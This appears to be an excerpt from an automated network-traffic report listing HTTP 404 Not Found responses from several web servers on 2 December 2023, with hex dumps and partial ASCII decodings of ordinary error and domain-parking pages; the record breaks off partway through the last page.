                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:28 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-67.ec2.internalX-Request-Id: e515b3d4-c8ca-47c7-9f5b-f83da9df6536Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1635Content-Type: text/htmlServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Sat, 02 Dec 2023 01:09:27 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sat, 02 Dec 2023 01:09:28 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 196Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 01:09:29 GMTContent-Type: text/htmlContent-Length: 867Connection: keep-aliveServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesExpires: Sat, 02 Dec 2023 01:09:38 GMTAge: 1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style>
